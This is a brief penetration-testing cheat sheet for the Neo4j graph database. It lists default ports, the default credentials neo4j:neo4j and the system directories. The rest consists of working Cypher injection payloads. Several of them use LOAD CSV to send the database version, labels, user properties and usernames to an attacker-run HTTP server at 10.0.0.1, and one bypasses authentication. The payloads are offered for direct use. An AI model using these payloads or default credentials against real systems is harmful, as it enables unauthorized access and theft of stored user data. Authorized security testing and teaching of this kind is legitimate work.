Neo4j Pentesting
Last modified: 2025-04-19
Neo4j is a graph database management system developed by Neo4j. Default ports are 6362 (Backup), 7474 (HTTP), 7473 (HTTPS), 7687 (Bolt).
Default Credentials
neo4j:neo4j
Common Directories & Files in Local System
/etc/neo4j
/var/lib/neo4j
/var/log/neo4j
Cypher Injection
Before injecting payloads, we need to start local web server to fetch the result of the query.
sudo python3 -m http.server 80
And then below are payloads.
In some payloads, replace 10.0.0.1 with your local ip address.
<!-- Get Neo4j version -->
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.0.0.1/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
<!-- Get labels -->
' OR 1=1 WITH 1 as a CALL db.labels() yield label LOAD CSV FROM 'http://10.0.0.1/?label='+label as l RETURN 0 as _0 //
<!-- Get properties of the key -->
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.0.1/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
<!-- Authentication Bypass -->
' OR 1=1 WITH 1 as a MATCH (n) WHERE n.name = "admin" and n.password = 1 OR 1=1 RETURN n LIMIT 0; //
<!-- Get username (assume that the label name is 'User') -->
' OR 1=1 WITH 1 as a MATCH (u:User) LOAD CSV FROM 'http://10.0.0.1/?value=' + toString(u.name) as l RETURN 0 as _0; //
For more detailed cheat sheet, see Cypher Injection Cheat Sheet.